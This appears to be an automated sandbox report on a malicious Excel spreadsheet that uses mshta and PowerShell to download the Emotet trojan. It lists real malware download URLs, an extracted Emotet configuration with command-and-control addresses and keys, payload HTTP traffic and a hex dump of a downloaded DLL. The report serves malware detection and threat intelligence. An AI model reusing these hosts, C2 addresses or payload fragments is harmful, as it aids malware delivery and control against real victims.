                            Source: http://91.240.118.168/qqw/aas/se.htmlfunctionAvira URL Cloud: Label: malware
                            Source: https://grupomartinsanchez.com/wAvira URL Cloud: Label: malware
                            Source: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlv1.0Avira URL Cloud: Label: malware
                            Source: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3Avira URL Cloud: Label: malware
                            Source: https://elroieyecentre.org/cgi-bAvira URL Cloud: Label: malware
                            Source: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3Avira URL Cloud: Label: malware
                            Source: http://jeffreylubin.igclout.com/wp-admin/vzOG/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.html~(Avira URL Cloud: Label: malware
                            Source: http://kuyporn.com/wp-content/XSs5/Avira URL Cloud: Label: malware
                            Source: http://docs-construction.com/wp-admin/JJEf0kEA5/Avira URL Cloud: Label: malware
                            Source: http://flybustravel.com/cgi-bin/2TjUH/Avira URL Cloud: Label: malware
                            Source: http://wallacebradley.com/css/YcAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.pngPE3Avira URL Cloud: Label: malware
                            Source: http://wallacebradley.com/css/YcDc927SJR/Avira URL Cloud: Label: malware
                            Source: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3Avira URL Cloud: Label: malware
                            Source: https://algzor.com/wp-includes/gAvira URL Cloud: Label: malware
                            Source: http://wallacebradley.com/css/YcDc927SJR/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.htmlAvira URL Cloud: Label: malware
                            Source: https://bluwom-milano.com/wp-content/FEj3y4z/Avira URL Cloud: Label: malware
                            Source: https://esaci-egypt.com/wp-includes/W7qXVeGp/Avira URL Cloud: Label: malware
                            Source: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/Avira URL Cloud: Label: malware
                            Source: http://kuyporn.comAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlNEAvira URL Cloud: Label: malware
                            Source: http://flybustravel.com/cgi-bin/2TjUH/PE3Avira URL Cloud: Label: malware
                            Source: http://kuyporn.com/wp-content/XSs5/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlBAvira URL Cloud: Label: malware
                            Source: https://bluwom-milano.com/wp-conAvira URL Cloud: Label: malware
                            Source: https://bluwom-milano.com/wp-content/FEj3y4z/PE3Avira URL Cloud: Label: malware
                            Source: http://jeffreylubin.igclout.comAvira URL Cloud: Label: malware
                            Source: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.html&EAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlnAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/seAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.pngAvira URL Cloud: Label: malware
                            Source: https://thaireportchannel.com/wpAvira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlsAvira URL Cloud: Label: malware
                            Source: http://jeffreylubin.igclout.com/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlC:Avira URL Cloud: Label: malware
                            Source: http://flybustravel.com/cgi-bin/Avira URL Cloud: Label: malware
                            Source: http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3Avira URL Cloud: Label: malware
                            Source: https://esaci-egypt.com/wp-incluAvira URL Cloud: Label: malware
                            Source: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168URL Reputation: Label: malware
                            Source: https://algzor.com/wp-includes/ghFXVrGLEh/PE3Avira URL Cloud: Label: malware
                            Source: https://algzor.com/wp-includes/ghFXVrGLEh/Avira URL Cloud: Label: malware
                            Source: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.168/qqw/aas/se.htmlmshtaAvira URL Cloud: Label: malware
                            Source: https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3Avira URL Cloud: Label: malware
                            Source: https://pcovestudio.com/wp-adminAvira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 19.2.rundll32.exe.180000.0.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
                            Multi AV Scanner detection for submitted file
                            Source: DETAILS-145.xlsReversingLabs: Detection: 34%
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\QWER.dllJoe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80
                            Source: global trafficDNS query: name: kuyporn.com
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.168:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.168:80
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorIPs: 74.207.230.120:8080
                            Source: Malware configuration extractorIPs: 139.196.72.155:8080
                            Source: Malware configuration extractorIPs: 37.44.244.177:8080
                            Source: Malware configuration extractorIPs: 37.59.209.141:8080
                            Source: Malware configuration extractorIPs: 116.124.128.206:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 54.37.228.122:443
                            Source: Malware configuration extractorIPs: 203.153.216.46:443
                            Source: Malware configuration extractorIPs: 168.197.250.14:80
                            Source: Malware configuration extractorIPs: 207.148.81.119:8080
                            Source: Malware configuration extractorIPs: 195.154.146.35:443
                            Source: Malware configuration extractorIPs: 78.46.73.125:443
                            Source: Malware configuration extractorIPs: 191.252.103.16:80
                            Source: Malware configuration extractorIPs: 210.57.209.142:8080
                            Source: Malware configuration extractorIPs: 185.168.130.138:443
                            Source: Malware configuration extractorIPs: 142.4.219.173:8080
                            Source: Malware configuration extractorIPs: 118.98.72.86:443
                            Source: Malware configuration extractorIPs: 78.47.204.80:443
                            Source: Malware configuration extractorIPs: 159.69.237.188:443
                            Source: Malware configuration extractorIPs: 190.90.233.66:443
                            Source: Malware configuration extractorIPs: 104.131.62.48:8080
                            Source: Malware configuration extractorIPs: 62.171.178.147:8080
                            Source: Malware configuration extractorIPs: 185.148.168.15:8080
                            Source: Malware configuration extractorIPs: 54.38.242.185:443
                            Source: Malware configuration extractorIPs: 198.199.98.78:8080
                            Source: Malware configuration extractorIPs: 194.9.172.107:8080
                            Source: Malware configuration extractorIPs: 85.214.67.203:8080
                            Source: Malware configuration extractorIPs: 66.42.57.149:443
                            Source: Malware configuration extractorIPs: 185.148.168.220:8080
                            Source: Malware configuration extractorIPs: 103.41.204.169:8080
                            Source: Malware configuration extractorIPs: 128.199.192.135:8080
                            Source: Malware configuration extractorIPs: 195.77.239.39:8080
                            Source: Malware configuration extractorIPs: 59.148.253.194:443
                            Source: global trafficHTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1Host: kuyporn.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1Host: jeffreylubin.igclout.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadContent-Length: 557056Connection: keep-aliveKeep-Alive: timeout=15Date: Fri, 28 Jan 2022 20:08:01 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Fri, 28 Jan 2022 20:08:01 GMTContent-Disposition: attachment; filename="v3Q.dll"Content-Transfer-Encoding: binarySet-Cookie: 61f44d2196a27=1643400481; expires=Fri, 28-Jan-2022 20:09:01 GMT; Max-Age=60; path=/Last-Modified: Fri, 28 Jan 2022 20:08:01 GMTX-Frame-Options: SAMEORIGINData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
                            Source: global trafficHTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                            Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
                            Source: Joe Sandbox ViewIP Address: 207.148.81.119 207.148.81.119
                            Source: Joe Sandbox ViewIP Address: 104.131.62.48 104.131.62.48
                            Source: unknownNetwork traffic detected: IP country count 15
                            Source: powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168
                            Source: powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se
                            Source: mshta.exe, 00000004.00000003.430703152.000000000031C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430722808.000000000032D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430440869.0000000002E3F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.451488221.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454957215.0000000002E41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454494947.000000000031C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454409701.00000000002B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454579949.0000000000345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.html
                            Source: mshta.exe, 00000004.00000002.454455576.00000000002EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.html&E
                            Source: DETAILS-145.xls.0.drString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlB
                            Source: mshta.exe, 00000004.00000002.454965047.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.452003548.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430447784.0000000002E55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.451488221.0000000002E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlC:
                            Source: mshta.exe, 00000004.00000002.454455576.00000000002EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlNE
                            Source: mshta.exe, 00000004.00000002.454409701.00000000002B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlWinSta0
                            Source: mshta.exe, 00000004.00000003.432443506.00000000024AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlfunction
                            Source: mshta.exe, 00000004.00000003.431930961.00000000024A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html
                            Source: mshta.exe, 00000004.00000002.454409701.00000000002B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlmshta
                            Source: mshta.exe, 00000004.00000002.454455576.00000000002EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmln
                            Source: mshta.exe, 00000004.00000002.454409701.00000000002B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmls
                            Source: mshta.exe, 00000004.00000003.451477206.0000000002E41000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430440869.0000000002E3F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454957215.0000000002E41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlv1.0
                            Source: mshta.exe, 00000004.00000002.454744998.00000000003E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.html~(
                            Source: powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.692139905.000000001B7E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.png
                            Source: powershell.exe, 00000006.00000002.690745051.000000000365E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.168/qqw/aas/se.pngPE3
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs-construction.com/wp-
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs-construction.com/wp-admin/JJEf0kEA5/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs-construction.com/wp-admin/JJEf0kEA5/PE3
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://flybustravel.com/cgi-bin/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://flybustravel.com/cgi-bin/2TjUH/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://flybustravel.com/cgi-bin/2TjUH/PE3
                            Source: powershell.exe, 00000006.00000002.690900197.000000000380B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jeffreylubin.igclout.com
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jeffreylubin.igclout.com/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jeffreylubin.igclout.com/wp-admin/vzOG/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kuyporn.c
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kuyporn.com
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kuyporn.com/wp-content/XS
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kuyporn.com/wp-content/XSs5/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kuyporn.com/wp-content/XSs5/PE3
                            Source: powershell.exe, 00000006.00000002.682272130.00000000002D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://piriform.comk
                            Source: rundll32.exe, 00000013.00000002.682859735.0000000002C17000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wallacebradley.com/css/Yc
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wallacebradley.com/css/YcDc927SJR/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wallacebradley.com/css/YcDc927SJR/PE3
                            Source: rundll32.exe, 00000013.00000002.682859735.0000000002C17000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
                            Source: mshta.exe, 00000004.00000002.454946718.0000000002E30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: mshta.exe, 00000004.00000003.430440869.0000000002E3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.comth4cM
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://algzor.c
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://algzor.com/wp-includes/g
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://algzor.com/wp-includes/ghFXVrGLEh/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://algzor.com/wp-includes/ghFXVrGLEh/PE3
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bluwom-milano.com/wp-con
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bluwom-milano.com/wp-content/FEj3y4z/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bluwom-milano.com/wp-content/FEj3y4z/PE3
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://elroieyecentre.org/cgi-b
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://esaci-egypt.com/wp-inclu
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://esaci-egypt.com/wp-includes/W7qXVeGp/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grupomartinsanchez.com/w
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pcovestudio.com/wp-admin
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://thaireportchannel.com/wp
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3
                            Source: powershell.exe, 00000006.00000002.690873747.00000000037B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.690900197.000000000380B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: kuyporn.com
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: global trafficHTTP traffic detected: GET /qqw/aas/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /qqw/aas/se.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-content/XSs5/ HTTP/1.1Host: kuyporn.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /wp-admin/vzOG/ HTTP/1.1Host: jeffreylubin.igclout.comConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
